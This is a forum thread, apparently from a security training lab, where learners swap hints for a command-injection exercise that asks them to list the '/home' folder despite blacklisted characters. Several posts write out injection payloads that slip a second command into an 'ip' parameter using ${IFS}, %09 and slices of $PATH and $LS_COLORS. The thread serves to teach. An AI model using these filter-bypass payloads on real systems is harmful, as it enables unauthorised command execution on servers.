Command Injections - Bypassing Other Blacklisted Characters

Hey. I’ve been stuck with this question. " Use what you learned in this section to find name of the user in the ‘/home’ folder. What user did you find?"

I’ve tried some payloads like${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr ‘!-}’ ‘"-~’<<<.gnld)},${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5},
but none of them works. It just returns something like this

Can someone give me a hint how to solve the question?

I updated my payload to${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.

I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=; /HOME but its not working for me. I feel like something is missing. What does yours translate too?

Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces use the “space bypass tecnique” on the previous sections


hey could you give a nudge for the final part of the syntax, i got the directory to print in the response but i cannot get whoami to work

Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look to <<< and subshell syntax like &{}, and don’t forget encoding.

1 Like

Hello everyone, Can anyone help me with this one?
I stuck also.
I used multiple scenarios but no luck:{IFS}{ls,-la}${IFS}${PATH:0:1}Home{IFS}{ls,-la}${IFS}${HOME:0:5} ${LS_COLORS:10:1}${IFS}${PATH:0:1}home

I am not getting invalid input in the responses for the above, but no luck finding the username so i believe to be in the right path of solving it.
Can anyone give me a tip to solve it?

This one was annoying because it depends on you guessing 2 parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting. Here’s a clue for those who are stuck: ip=${IFS}ls%09${PATH:0:1}home


use can use something like this

1 Like

Thank you sir!


Thank you!